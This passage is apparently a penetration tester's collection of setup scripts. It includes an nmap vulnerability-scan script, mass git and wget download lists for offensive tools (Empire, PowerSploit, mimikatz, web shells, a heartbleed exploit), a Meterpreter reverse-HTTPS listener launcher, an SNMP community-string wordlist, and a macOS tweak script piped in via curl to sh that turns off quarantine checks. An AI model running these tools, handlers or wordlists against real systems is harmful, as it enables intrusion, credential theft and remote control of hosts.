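  # "--" keeps an entry that begins with '-' from being read as an option.
  git clone -- "$repo" || printf 'clone failed: %s\n' "$repo" >&2
done
set +f
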
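--------------------------------------------------------------------------------
/gitme:
--------------------------------------------------------------------------------
#!/bin/bash
# gitme - stage everything in the current repository, commit and push it to
# origin/master.
#cd gitlist

# "-f" also stages files matched by .gitignore, so anything the ignore rules
# were meant to keep out of the repository goes out with the push below.
# NOTE(review): confirm that is intended; `git status --ignored` lists what
# would be swept in.
# "--" keeps a file name that begins with '-' from being parsed as an option.
git add -A -f -- *
git commit -m "adding a few tools"
git push -u origin master

--------------------------------------------------------------------------------
/gitupdate.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# gitupdate.sh - run "git pull" in every repository found in the parent of
# the current working directory.

cd ../ || exit 1

for repo in */; do
  # Only descend into git work trees. Previously a failed cd (plain file,
  # unreadable directory) still ran "sudo git pull" in the directory the
  # loop was standing in.
  [ -e "${repo}.git" ] || continue

  # Subshell: the directory change is undone on exit. The earlier version
  # returned to a hard-coded /opt, which is only right when the parent
  # directory happens to be /opt.
  #
  # git runs as root here, as before: pulled files end up root-owned, and
  # any hook or helper configured in the repository runs with root
  # privileges. NOTE(review): consider giving the operator's account
  # ownership of the tree and dropping sudo.
  (
    cd -- "$repo" || exit 1
    sudo git pull 2>/dev/null
  ) || printf 'git pull failed in %s\n' "$repo" >&2
done

--------------------------------------------------------------------------------
/gitupdate2.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# gitupdate2.sh - run "git pull" in every repository under
# /Applications/GITLIST-PACKAGES.

cd /Applications/GITLIST-PACKAGES || exit 1

for repo in */; do
  # Only descend into git work trees; a failed cd used to leave
  # "sudo git pull" running in the base directory instead.
  [ -e "${repo}.git" ] || continue

  # git runs as root here, as before: pulled files end up root-owned, and
  # any hook or helper configured in the repository runs with root
  # privileges. NOTE(review): consider dropping sudo.
  (
    cd -- "$repo" || exit 1
    sudo git pull 2>/dev/null
  ) || printf 'git pull failed in %s\n' "$repo" >&2
done

--------------------------------------------------------------------------------
/jk-fierce.tar:
--------------------------------------------------------------------------------
1 | jk-fierce/000755 000766 000024 00000000000 12647706124 014310 5ustar00james.kellystaff000000 000000 jk-fierce/hosts.txt000644 000766 000024 00000000011 12647706100 016173 0ustar00james.kellystaff000000 000000 1617
2 | 
--------------------------------------------------------------------------------
/jk-fierce/hosts.txt:
--------------------------------------------------------------------------------
1 | 1617
2 | 
--------------------------------------------------------------------------------
/jknmap:
--------------------------------------------------------------------------------
#!/bin/bash
# jknmap - run a fixed series of nmap, sslscan and whatweb checks against
# one host and print a banner before each step.
# Usage: jknmap hostname
# Writes sslscan-accepted.txt in the current directory (overwritten per run).
if [ "$#" -ne 1 ]; then
  echo 1>&2 "usage: jknmap hostname"
  exit 127
fi

target=$1
# The host name is handed to tools that run under sudo. Refuse a value the
# tools would read as an option, and anything containing whitespace.
case "$target" in
  '' | -* | *[[:space:]]*)
    echo 1>&2 "usage: jknmap hostname"
    exit 127
    ;;
esac

# Disabled variants kept from the original. The "–script-args" in them is
# written with an en dash and has to become "--script-args" before any of
# these lines is re-enabled.
# sudo nmap -sS -sV --script=vulscan/vulscan.nse $1 && \
# sudo nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv $1 && \
# sudo nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 $1 && \
# sudo nmap -PN -sS -sV --script=vulscan –script-args vulscancorrelation=1 -p80 $1 && \
# sudo nmap -sV --script=vuln $1 && \
# sudo nmap -PN -sS -sV --script=all –script-args vulscancorrelation=1 $1 && \
#---------------------------------------------------------------------------------------
sudo nmap -sV -sC "$target"
#sudo nmap -p 443 --script ssl-ccs-injection $1 CHECK SYNTAX key
sudo nmap -sV -sC -vv "$target"
#sudo nmap --script=ssl-date $1 && \

# From here on the steps are chained with &&: the first failing command
# stops the rest of the chain.
echo "Enumerating SSL ciphers." && \
sudo nmap --script ssl-enum-ciphers -p 443 "$target" && \
echo "Enumerating Accepted Ciphers with SSLscan" && \
# grep exits non-zero when nothing matches; without "|| true" an empty
# result silently skipped every check below this line.
{ sslscan "$target" | grep Accepted > sslscan-accepted.txt || true; } && \
echo "Checking for heartbleed." && \
sudo nmap -p 443 --script ssl-heartbleed "$target" && \
echo "Checking for ssl known key." && \
sudo nmap --script ssl-known-key -p 443 "$target" && \
echo "Checking for POODLE" && \
sudo nmap -sV --version-light --script ssl-poodle -p 443 "$target" && \
echo "Checking for HTTP methods." && \
sudo nmap --script http-methods --script-args http.url-path='/' "$target" && \
echo "Checking for TRACE method." && \
sudo nmap --script http-trace -d "$target" && \
echo "Checking for method tamper." && \
sudo nmap -sV --script http-method-tamper "$target" && \
echo "Checking for slowloris" && \
sudo nmap --script http-slowloris-check "$target" && \
echo "--SYNFULKNOCK--"

# NOTE(review): the two nmap calls below run without sudo, unlike the ones
# above; -sS needs raw-socket privileges, so confirm how this script is run.
nmap -sS -Pn -n -T4 -p 80 --script synfulknock "$target"
echo TESTTESTTEST
#---------------------------------------------------------------------------------------
nmap -Pn -sV -sC -p 443,80 --script ssl-enum-ciphers,ssl-heartbleed,ssl-known-key,ssl-poodle,http-trace,http-method-tamper,http-slowloris-check,all-cipher-checks,synfulknock "$target" && \
echo "--WHATWEB--" && \
whatweb "$target"

--------------------------------------------------------------------------------
/macosxhack.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env sh
2 | 
3 | ##
4 | # This is script with usefull tips taken from:
5 | # https://github.com/mathiasbynens/dotfiles/blob/master/.osx
6 | #
7 | # install it:
8 | # curl -sL https://raw.github.com/gist/2108403/hack.sh | sh
9 | #
10 | 
11 | echo "Enable full keyboard access for all controls (e.g.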
enable Tab in modal dialogs)" 12 | defaults write NSGlobalDomain AppleKeyboardUIMode -int 3 13 | 14 | echo "Enable subpixel font rendering on non-Apple LCDs" 15 | defaults write NSGlobalDomain AppleFontSmoothing -int 2 16 | 17 | echo "Enable the 2D Dock" 18 | defaults write com.apple.dock no-glass -bool true 19 | 20 | # Automatically hide and show the Dock 21 | # defaults write com.apple.dock autohide -bool true 22 | 23 | echo "Make Dock icons of hidden applications translucent" 24 | defaults write com.apple.dock showhidden -bool true 25 | 26 | echo "Enable iTunes track notifications in the Dock" 27 | defaults write com.apple.dock itunes-notifications -bool true 28 | 29 | # Disable menu bar transparency 30 | defaults write NSGlobalDomain AppleEnableMenuBarTransparency -bool false 31 | 32 | # Show remaining battery time; hide percentage 33 | # defaults write com.apple.menuextra.battery ShowPercent -string "NO" 34 | # defaults write com.apple.menuextra.battery ShowTime -string "YES" 35 | 36 | # echo "Always show scrollbars" 37 | # defaults write NSGlobalDomain AppleShowScrollBars -string "Auto" 38 | 39 | echo "Allow quitting Finder via ⌘ + Q; doing so will also hide desktop icons" 40 | defaults write com.apple.finder QuitMenuItem -bool true 41 | 42 | # Disable window animations and Get Info animations in Finder 43 | # defaults write com.apple.finder DisableAllAnimations -bool true 44 | 45 | echo "Show all filename extensions in Finder" 46 | defaults write NSGlobalDomain AppleShowAllExtensions -bool true 47 | 48 | echo "Use current directory as default search scope in Finder" 49 | defaults write com.apple.finder FXDefaultSearchScope -string "SCcf" 50 | 51 | echo "Show Path bar in Finder" 52 | defaults write com.apple.finder ShowPathbar -bool true 53 | 54 | echo "Show Status bar in Finder" 55 | defaults write com.apple.finder ShowStatusBar -bool true 56 | 57 | echo "Expand save panel by default" 58 | defaults write NSGlobalDomain NSNavPanelExpandedStateForSaveMode 
-bool true 59 | 60 | echo "Expand print panel by default" 61 | defaults write NSGlobalDomain PMPrintingExpandedStateForPrint -bool true 62 | 63 | echo "Disable the “Are you sure you want to open this application?” dialog" 64 | defaults write com.apple.LaunchServices LSQuarantine -bool false 65 | 66 | echo "Disable shadow in screenshots" 67 | defaults write com.apple.screencapture disable-shadow -bool true 68 | 69 | echo "Enable highlight hover effect for the grid view of a stack (Dock)" 70 | defaults write com.apple.dock mouse-over-hilte-stack -bool true 71 | 72 | echo "Enable spring loading for all Dock items" 73 | defaults write enable-spring-load-actions-on-all-items -bool true 74 | 75 | echo "Show indicator lights for open applications in the Dock" 76 | defaults write com.apple.dock show-process-indicators -bool true 77 | 78 | # Don’t animate opening applications from the Dock 79 | # defaults write com.apple.dock launchanim -bool false 80 | 81 | echo "Display ASCII control characters using caret notation in standard text views" 82 | # Try e.g. 
`cd /tmp; unidecode "\x{0000}" > cc.txt; open -e cc.txt` 83 | defaults write NSGlobalDomain NSTextShowsControlCharacters -bool true 84 | 85 | echo "Disable press-and-hold for keys in favor of key repeat" 86 | defaults write NSGlobalDomain ApplePressAndHoldEnabled -bool false 87 | 88 | echo "Set a blazingly fast keyboard repeat rate" 89 | defaults write NSGlobalDomain KeyRepeat -int 0.02 90 | 91 | echo "Set a shorter Delay until key repeat" 92 | defaults write NSGlobalDomain InitialKeyRepeat -int 12 93 | 94 | echo "Disable auto-correct" 95 | defaults write NSGlobalDomain NSAutomaticSpellingCorrectionEnabled -bool false 96 | 97 | # Disable opening and closing window animations 98 | # defaults write NSGlobalDomain NSAutomaticWindowAnimationsEnabled -bool false 99 | 100 | echo "Enable AirDrop over Ethernet and on unsupported Macs running Lion" 101 | defaults write com.apple.NetworkBrowser BrowseAllInterfaces -bool true 102 | 103 | echo "Disable disk image verification" 104 | defaults write com.apple.frameworks.diskimages skip-verify -bool true 105 | defaults write com.apple.frameworks.diskimages skip-verify-locked -bool true 106 | defaults write com.apple.frameworks.diskimages skip-verify-remote -bool true 107 | 108 | echo "Automatically open a new Finder window when a volume is mounted" 109 | defaults write com.apple.frameworks.diskimages auto-open-ro-root -bool true 110 | defaults write com.apple.frameworks.diskimages auto-open-rw-root -bool true 111 | defaults write com.apple.finder OpenWindowForNewRemovableDisk -bool true 112 | 113 | echo "Display full POSIX path as Finder window title" 114 | defaults write com.apple.finder _FXShowPosixPathInTitle -bool true 115 | 116 | # Increase window resize speed for Cocoa applications 117 | defaults write NSGlobalDomain NSWindowResizeTime -float 0.001 118 | 119 | echo "Avoid creating .DS_Store files on network volumes" 120 | defaults write com.apple.desktopservices DSDontWriteNetworkStores -bool true 121 | 122 | echo "Disable 
the warning when changing a file extension" 123 | defaults write com.apple.finder FXEnableExtensionChangeWarning -bool false 124 | 125 | echo "Show item info below desktop icons" 126 | /usr/libexec/PlistBuddy -c "Set :DesktopViewSettings:IconViewSettings:showItemInfo true" ~/Library/Preferences/com.apple.finder.plist 127 | 128 | echo "Enable snap-to-grid for desktop icons" 129 | /usr/libexec/PlistBuddy -c "Set :DesktopViewSettings:IconViewSettings:arrangeBy grid" ~/Library/Preferences/com.apple.finder.plist 130 | 131 | echo "Disable the warning before emptying the Trash" 132 | defaults write com.apple.finder WarnOnEmptyTrash -bool false 133 | 134 | # Empty Trash securely by default 135 | # defaults write com.apple.finder EmptyTrashSecurely -bool true 136 | 137 | echo "Require password immediately after sleep or screen saver begins" 138 | defaults write com.apple.screensaver askForPassword -int 1 139 | defaults write com.apple.screensaver askForPasswordDelay -int 0 140 | 141 | echo "Enable tap to click (Trackpad)" 142 | defaults write com.apple.driver.AppleBluetoothMultitouch.trackpad Clicking -bool true 143 | 144 | echo "Map bottom right Trackpad corner to right-click" 145 | defaults write com.apple.driver.AppleBluetoothMultitouch.trackpad TrackpadCornerSecondaryClick -int 2 146 | defaults write com.apple.driver.AppleBluetoothMultitouch.trackpad TrackpadRightClick -bool true 147 | 148 | echo "Disable Safari’s thumbnail cache for History and Top Sites" 149 | defaults write com.apple.Safari DebugSnapshotsUpdatePolicy -int 2 150 | 151 | echo "Enable Safari’s debug menu" 152 | defaults write com.apple.Safari IncludeInternalDebugMenu -bool true 153 | 154 | echo "Make Safari’s search banners default to Contains instead of Starts With" 155 | defaults write com.apple.Safari FindOnPageMatchesWordStartsOnly -bool false 156 | 157 | # Remove useless icons from Safari’s bookmarks bar 158 | # defaults write com.apple.Safari ProxiesInBookmarksBar "()" 159 | 160 | echo "Add a 
context menu item for showing the Web Inspector in web views" 161 | defaults write NSGlobalDomain WebKitDeveloperExtras -bool true 162 | 163 | echo "Only use UTF-8 in Terminal.app" 164 | defaults write com.apple.terminal StringEncodings -array 4 165 | 166 | echo "Disable the Ping sidebar in iTunes" 167 | defaults write com.apple.iTunes disablePingSidebar -bool true 168 | 169 | echo "Disable all the other Ping stuff in iTunes" 170 | defaults write com.apple.iTunes disablePing -bool true 171 | 172 | echo "Make ⌘ + F focus the search input in iTunes" 173 | defaults write com.apple.iTunes NSUserKeyEquivalents -dict-add "Target Search Field" "@F" 174 | 175 | # Disable send and reply animations in Mail.app 176 | # defaults write com.apple.Mail DisableReplyAnimations -bool true 177 | # defaults write com.apple.Mail DisableSendAnimations -bool true 178 | 179 | # Disable Resume system-wide 180 | # defaults write NSGlobalDomain NSQuitAlwaysKeepsWindows -bool false 181 | 182 | echo "Disable the “reopen windows when logging back in” option" 183 | # This works, although the checkbox will still appear to be checked. 
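defaults write com.apple.loginwindow TALLogoutSavesState -bool false
defaults write com.apple.loginwindow LoginwindowLaunchesRelaunchApps -bool false

echo "Enable Dashboard dev mode (allows keeping widgets on the desktop)"
defaults write com.apple.dashboard devmode -bool true

echo "Reset Launchpad"
# `[ -e glob ]` breaks as soon as the glob matches more than one file; rm -f
# copes with no match, one match or several.
rm -f ~/Library/Application\ Support/Dock/*.db

echo "Show the ~/Library folder"
chflags nohidden ~/Library

echo "Disable local Time Machine backups"
# `&>` is a bash extension; under a plain POSIX sh it backgrounds the command
# instead of silencing it, so use the portable redirection.
command -v tmutil >/dev/null 2>&1 && sudo tmutil disablelocal

echo "Remove Dropbox’s green checkmark icons in Finder"
file=/Applications/Dropbox.app/Contents/Resources/check.icns
[ -e "$file" ] && mv -f "$file" "$file.bak"
unset file

#Fix for the ancient UTF-8 bug in QuickLook (http://mths.be/bbo)
# Commented out, as this is known to cause problems when saving files in Adobe Illustrator CS5 :(
#echo "0x08000100:0" > ~/.CFUserTextEncoding

echo "Kill affected applications"
for app in Safari Finder Dock Mail SystemUIServer; do killall "$app" >/dev/null 2>&1; done
--------------------------------------------------------------------------------
/powershell.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Clone each repository listed below into /var/www.
#
# Caveat: /var/www is normally a web server's document root. Everything cloned
# there, including each repository's .git directory, becomes downloadable by
# anyone who can reach that server unless access to it is restricted.
#
# Several entries resolve to the same directory name (for example the two
# PowerSploit URLs); the later clone fails because the directory already
# exists, and that failure is now reported instead of passing unnoticed.
a=$(cat <<'EOF'
https://github.com/ChrisTruncer/WMIOps.git
https://github.com/Kevin-Robertson/Inveigh.git
https://github.com/PowerShellEmpire/Empire.git
https://github.com/PowerShellEmpire/PowerTools.git
https://github.com/PowerShellMafia/PowerSploit.git
https://github.com/PyroTek3/PowerShell-AD-Recon.git
https://github.com/Shellntel/scripts.git
https://github.com/Veil-Framework/Veil.git
https://github.com/besimorhino/powercat.git
https://github.com/byt3bl33d3r/CrackMapExec.git
https://github.com/darkoperator/Posh-SSH.git
https://github.com/darkoperator/Posh-SecMod.git
https://github.com/denandz/KeeFarce.git
https://github.com/iagox86/dnscat2.git
https://github.com/mattifestation/PowerShellArsenal
https://github.com/mattifestation/PowerShellArsenal.git
https://github.com/mattifestation/PowerSploit.git
https://github.com/morgoroth/Veil-PowerView.git
https://github.com/rvrsh3ll/POSH-Commander.git
https://github.com/samratashok/nishang.git
https://github.com/secabstraction/Create-WMIshell.git
https://github.com/secabstraction/PowerCat.git
https://github.com/secabstraction/WmiSploit.git
https://github.com/vacmf/powershell-scripts.git
https://github.com/xorrior/RandomPS-Scripts.git
https://github.com/ChrisTruncer/WMIOps.git
https://github.com/HarmJ0y/CheatSheets.git
https://github.com/enigma0x3/Powershell-Payload-Excel-Delivery.git
https://github.com/tfairane/DocDropper.git
https://github.com/Kevin-Robertson/Tater.git
https://github.com/jaredhaight/PSAttack.git
EOF
)
# Stop if the destination is missing; otherwise every clone would land in
# whatever directory the script was started from.
cd /var/www || exit 1
# $a is left unquoted on purpose: it is split on whitespace into one URL per
# iteration.
for i in $a
do
  git clone "$i" || echo "clone failed: $i" 1>&2
done
-------------------------------------------------------------------------------- /replace-openjdk-with-oraclejdk.txt: -------------------------------------------------------------------------------- 1 | I may attempt to move over to the new VM to finish out the training tomorrow. We can decide 2 | as a class in the morning. In the mean time, use the following guide to remove the 3 | troublesome version of Java and install a functional version on the original VM, not the one 4 | we used for most of the day today. If you have any questions or issues, please contact me or 5 | arrive early tomorrow and I can help. Have a good evening.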
6 | 7 | Remove old version of Java 8 | ========================== 9 | sudo apt-get purge openjdk* 10 | 11 | Install new version of Java 12 | =========================== 13 | sudo add-apt-repository ppa:webupd8team/java 14 | sudo apt-get update 15 | sudo apt-get install oracle-java8-installer 16 | 17 | Verify Java install 18 | =================== 19 | java -version 20 | 21 | Optional cleanup 22 | ================ 23 | sudo apt-get autoremove 24 | 25 | Tim Tomes 26 | @lanmaster53 27 | http://www.lanmaster53.com 28 | http://appsec.rocks 29 | -------------------------------------------------------------------------------- /snmp-all-community.txt: -------------------------------------------------------------------------------- 1 | 0 2 | 0392a0 3 | 1234 4 | 2read 5 | 4changes 6 | access 7 | adm 8 | admin 9 | Admin 10 | agent 11 | agent_steal 12 | all 13 | all private 14 | all public 15 | ANYCOM 16 | apc 17 | bintec 18 | blue 19 | c 20 | C0de 21 | cable-d 22 | cacti 23 | canon_admin 24 | cc 25 | cisco 26 | CISCO 27 | community 28 | compaq 29 | compaq1 30 | Compaq1 31 | COMPAQ1 32 | core 33 | CR52401 34 | debug 35 | default 36 | dilbert 37 | enable 38 | field 39 | field-service 40 | freekevin 41 | fubar 42 | guest 43 | hello 44 | hideit 45 | host 46 | hp 47 | HP 48 | hp1 49 | HP1 50 | hp_admin 51 | hpsnmp 52 | HPsnmp 53 | HPSNMP 54 | hpsnmp1 55 | ibm 56 | IBM 57 | ilmi 58 | ILMI 59 | intermec 60 | Intermec 61 | internal 62 | l2 63 | l3 64 | liteon 65 | manager 66 | mngt 67 | monitor 68 | mrtg 69 | nagios 70 | netman 71 | network 72 | NoGaH$@! 
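73 | none 74 | notsopublic 75 | ntopia 76 | openview 77 | OrigEquipMfr 78 | ourCommStr 79 | pass 80 | password 81 | pr1v4t3 82 | pr1vat3 83 | private 84 | Private 85 | PRIVATE 86 | private1 87 | PRIVATE1 88 | private@es0 89 | Private@es0 90 | private@es1 91 | Private@es1 92 | proxy 93 | publ1c 94 | public 95 | Public 96 | PUBLIC 97 | public1 98 | PUBLIC1 99 | public@es0 100 | public@es1 101 | public/RO 102 | read 103 | read-only 104 | readwrite 105 | read-write 106 | red 107 | regional 108 | 109 | rmon 110 | rmon_admin 111 | ro 112 | root 113 | router 114 | rw 115 | rwa 116 | s!a@m#n$p%c 117 | sanfran 118 | san-fran 119 | scotty 120 | secret 121 | Secret 122 | SECRET 123 | security 124 | Security 125 | SECURITY 126 | seri 127 | snmp 128 | SNMP 129 | snmpd 130 | snmp-get 131 | snmptrap 132 | SNMP_trap 133 | SNMPv1/v2c 134 | SNMPv2c 135 | solaris 136 | solarwinds 137 | sun 138 | SUN 139 | superuser 140 | switch 141 | Switch 142 | SWITCH 143 | system 144 | System 145 | SYSTEM 146 | tech 147 | test 148 | TEST 149 | test2 150 | tiv0li 151 | tivoli 152 | topsecret 153 | traffic 154 | trap 155 | watch 156 | watchit 157 | world 158 | write 159 | writeit 160 | xyzzy 161 | yellow 162 |
--------------------------------------------------------------------------------
/start-listener.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
#
# StartListener.py
# Simple python script to start a Meterpreter HTTPs Handler
# by Chris Campbell (obscuresec)
#
import sys
import subprocess


#write a resource file and call it
def build(lhost, lport):
    """Write listener.rc in the current directory and run msfconsole on it.

    lhost and lport are placed on the "set LHOST" and "set LPORT" lines of
    the resource file. Raises ValueError when either value is not a single
    token, because the resource file is read as one console command per line
    and such a value would add lines of its own.
    """
    lhost = str(lhost)
    lport = str(lport)
    if not lhost or any(ch.isspace() for ch in lhost):
        raise ValueError("lhost must be a single host name or address")
    if not lport.isdigit() or not 0 < int(lport) < 65536:
        raise ValueError("lport must be a port number between 1 and 65535")

    options = "use multi/handler\n"
    options += "set payload windows/meterpreter/reverse_https\nset LHOST {0}\nset LPORT {1}\n".format(lhost, lport)
    options += "set ExitOnSession false\nset AutoRunScript post/windows/manage/smart_migrate\nexploit -j\n"
    # open() instead of the Python 2-only file(); the with block closes the
    # handle even if the write fails.
    with open("listener.rc", "w") as filewrite:
        filewrite.write(options)
    # Argument list rather than shell=True: no shell parses the command line.
    subprocess.Popen(["/opt/metasploit/app/msfconsole", "-r", "listener.rc"]).wait()


#grab args
try:
    lhost = sys.argv[1]
    lport = sys.argv[2]

#index error
except IndexError:
    print("python StartListener.py lhost lport")
else:
    # build() is called outside the try above so that an IndexError raised
    # inside it is not mistaken for missing arguments.
    try:
        build(lhost, lport)
    except ValueError as err:
        print(err)
-------------------------------------------------------------------------------- /svn.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | cd /opt 3 | #svn checkout http://nipper-ng.googlecode.com/svn/trunk/nipper-ng-read-only 4 | -------------------------------------------------------------------------------- /wgetlist.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | a=`cat <<-EOF 3 | http://downloads.sourceforge.net/project/yokoso/yokoso-0.1/yokoso.0.1.tar.gz 4 | https://raw.github.com/hdm/scan-tools/master/nse/banner-plus.nse 5 | https://labs.portcullis.co.uk/download/wordpress-build-review_v1.0.tar.gz 6 | https://labs.portcullis.co.uk/download/rdp-sec-check-0.9.tgz 7 | https://labs.portcullis.co.uk/download/allthevhosts.tar.gz 8 | https://labs.portcullis.co.uk/download/ssl-cipher-suite-enum-v0.9.9.tar.gz 9 | https://labs.portcullis.co.uk/download/SSHatter-1.0.tar.gz 10 | http://dev.zenoss.org/svn/trunk/inst/externallibs/wmi-1.3.7.tar.bz2 11 | https://labs.portcullis.co.uk/download/enum4linux-0.8.9.tar.gz 12 | http://www.exploit-db.com/download/19091 13 | http://www.ampliasecurity.com/research/wce_v1_4beta_x32.zip 14 | https://raw.githubusercontent.com/zacinaction/kicksat-groundstation/master/SpriteReceiver.grc 15 | https://github.com/CCSIR/PHP-EXIF-Backdoors-generator-using-custom-shellcode/raw/master/shellcode.php 16 | http://downloads.sourceforge.net/project/aspshell/aspshell/aspshell%200.2/aspshell-0.2.zip 17 | https://davtest.googlecode.com/files/davtest-1.0.zip 18 | https://github.com/obscuresec/random/raw/master/StartListener.py 19 | 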
http://fimap.googlecode.com/files/fimap_alpha_v09.tar.gz 20 | https://ua-tester.googlecode.com/files/UAtester_PTEG.mht 21 | http://valgrind.org/downloads/valgrind-3.9.0.tar.bz2 22 | https://hash-identifier.googlecode.com/files/Hash_ID_v1.1.py 23 | https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-1.9.7-linux-x86_64.tar.bz2 24 | http://sparty.secniche.org/sparty_v_0.1.tar.gz 25 | http://downloads.sourceforge.net/project/spscan/spscan-v1.tar.gz 26 | http://downloads.sourceforge.net/project/netoolsh/opensource.tar.gz 27 | https://fimap.googlecode.com/files/fimap_alpha_v09.tar.gz 28 | http://downloads.sourceforge.net/project/moscrack/moscrack-2.08b.tar.gz 29 | https://subterfuge.googlecode.com/files/subterfuge_1.0-1_all.deb 30 | http://www.toolswatch.org/dpe/dpeparser.py 31 | https://labs.portcullis.co.uk/download/hoppy-1.8.1.tar.bz2 32 | https://media.defcon.org/dc-18/tools/dc-18-isr-evilgrade-1.0.0.tar.gz 33 | https://media.defcon.org/dc-18/tools/dc-18-bluetooth.zip 34 | https://media.defcon.org/dc-16/tools/modscan_0.1.tar 35 | https://media.defcon.org/dc-16/tools/squirtle-1.1a.zip 36 | https://media.defcon.org/dc-16/tools/voiper-0.07.tar.gz 37 | http://kmkeen.com/tmp/heatmap.py.txt 38 | http://www.exploresecurity.com/wp-content/uploads/custom/william.sh 39 | ftp://ftp.freeradius.org/pub/radius/old/freeradius-server-2.1.12.tar.bz2 40 | https://raw.github.com/brad-anton/freeradius-wpe/master/freeradius-wpe.patch 41 | https://autocrack.googlecode.com/files/autocrack3.1.sh 42 | https://autosploit.googlecode.com/files/autosploit.pl 43 | http://downloads.sourceforge.net/project/watobo/watobo_0.9.5rev226.zip 44 | http://www.baudline.com/baudline_1.08_linux_x86_64.tar.gz 45 | http://www.sharebrained.com/downloads/gnuradio/microphone_shure.grc 46 | https://github.com/greatscottgadgets/ubertooth/archive/2014-04-R1.tar.gz 47 | https://github.com/downloads/hpux735/Cocoa-Radio/CocoaRadio.zip 48 | http://nodejs.org/dist/v0.10.31/node-v0.10.31-linux-x64.tar.gz 49 | 
https://github.com/Jermolene/TiddlyWiki5.git 50 | http://www.gat3way.eu/poc/swscan.tgz 51 | http://live.sysinternals.com/psexec.exe 52 | http://www.wxtoimg.com/downloads/wxtoimg-linux64-2.10.11-1.tar.gz 53 | http://debianuser.org/bruteforce/passlist.txt 54 | http://debianuser.org/bruteforce/brutessh.zip 55 | http://downloads.sourceforge.net/jrdesktop/jrdesktop-0.2.0030.bin.zip 56 | https://www.dropbox.com/s/1j6v6zbtsdg1kam/Kerberoast.pdf 57 | http://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip 58 | https://web.archive.org/web/20130806142902/http://download.sysinternals.com/files/Procdump.zip 59 | https://www.trustedsec.com/files/encrypted_http_shell.zip 60 | https://www.trustedsec.com/files/SqlBrute.zip 61 | https://www.trustedsec.com/files/delldrac.py 62 | http://download.sysinternals.com/files/PSTools.zip 63 | https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch-1.4.2.deb 64 | http://www.w1hkj.com/downloads/fldigi/fldigi-3.22.05.tar.gz 65 | http://www.wirelessdefence.org/Contents/Files/aircrack-ptw-1.0.0.tar.gz 66 | http://downloads.sourceforge.net/project/wapiti/wapiti/wapiti-2.3.0/wapiti-2.3.0.tar.gz 67 | https://github.com/ikkisoft/bradamsa/releases/download/v0.2/bradamsa0.2.jar 68 | https://owasp-testing-checklist.googlecode.com/files/OWASPTestingChecklist_v_1.0.xls 69 | https://fimap.googlecode.com/files/fimap_alpha_v09.tar.gz 70 | https://squirtle.googlecode.com/files/squirtle-1.1a.zip 71 | http://sniff.su/Intercepter-NG.CE.05.zip 72 | http://comax.fr/yamas/bt5/yamas.sh 73 | http://downloads.sourceforge.net/project/airpwn/airpwn/1.4/airpwn-1.4.tgz 74 | https://github.com/gentilkiwi/mimikatz/releases/download/2.0.0-alpha-20151113/mimikatz_trunk.zip 75 | https://github.com/adafruit/Adafruit-Pi-Finder/releases/download/v2.0.1-beta/pibootstrap_linux64.tar.gz 76 | http://www.securitysift.com/download/linuxprivchecker.py 77 | http://pentestmonkey.net/tools/unix-privesc-check/unix-privesc-check-1.4.tar.gz 78 | 
www.securitysift.com/download/linuxprivchecker.py 79 | https://www.trustedsec.com/files/PowerShell_PoC.zip 80 | https://www.trustedsec.com/files/egressbuster.zip 81 | https://www.trustedsec.com/files/encrypted_http_shell.zip 82 | https://www.trustedsec.com/files/egress_buster_revshell.zip 83 | http://marathontool.codeplex.com/# 84 | https://raw.githubusercontent.com/SmeegeSec/Directory_File_Listing_Parser_Importer/master/Directory-File-Listing-Parser-Importer.py 85 | http://www.ittools.se/security%20tools/gsecdump-0.6-win32.zip 86 | http://www.ittools.se/security%20tools/gsecdump-v2b5.exe 87 | http://www.ittools.se/security%20tools/IeInfo.exe 88 | http://www.ittools.se/security%20tools/iTouch.exe 89 | http://www.ittools.se/security%20tools/lslsass32.exe 90 | http://www.ittools.se/security%20tools/lslsass64.exe 91 | http://www.ittools.se/security%20tools/MssqlBf.exe 92 | http://www.ittools.se/security%20tools/msvctl_0.3.zip 93 | http://www.ittools.se/security%20tools/ntdd.exe 94 | http://www.ittools.se/security%20tools/ntlsobj.exe 95 | http://www.ittools.se/security%20tools/parallel_task.js 96 | http://www.ittools.se/security%20tools/runhash32.exe 97 | http://www.ittools.se/security%20tools/runhash64.exe 98 | http://www.ittools.se/security%20tools/vscompat2k.exe 99 | https://raw.githubusercontent.com/carnal0wnage/Metasploit-Code/master/modules/post/windows/gather/gold_digger.rb 100 | https://github.com/ChrisTruncer/Egress-Assess/archive/1.0.zip 101 | https://github.com/xtr4nge/FruityWifi/archive/v2.2.zip 102 | http://www.andlabs.org/tools/sotf/Shell%20of%20the%20Future_v0.9.zip 103 | http://www.andlabs.org/tools/imposter/imposter_v0.9.zip 104 | http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz 105 | https://github.com/Arachni/arachni/releases/download/v1.2.1/arachni-1.2.1-0.5.7.1-linux-x86_64.tar.gz 106 | http://hostap.epitest.fi/releases/hostapd-2.2.tar.gz 107 | https://goofile.googlecode.com/files/goofilev1.5.zip 108 | 
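https://raw.githubusercontent.com/tennc/xss/master/xss-payloads/Xenotix-payloads.list
https://github.com/byt3bl33d3r/gcat/archive/master.zip
http://ptscripts.googlecode.com/svn/trunk/dshashes.py
https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/heartbleed.c
https://github.com/OWASP/O-Saft/raw/master/o-saft.tgz
https://github.com/xtr4nge/FruityWifi/archive/v2.2.zip
https://github.com/RandomStorm/Bluto/archive/v1.1.5.tar.gz
www.ernw.de/download/dnsdigger.zip
http://lcamtuf.coredump.cx/afl/releases/afl-latest.tgz
http://blog.0x0lab.org/wp-content/uploads/2010/06/dict_populator.zip
http://hashcat.net/files/hashcat-0.50.7z
http://home.btconnect.com/md5decrypter/HashcatGUI_044.zip
https://github.com/entropy1337/infernal-twin/archive/master.zip
http://downloads.sourceforge.net/project/isic/isic/ISIC%20v0.07/isic-0.07.tgz
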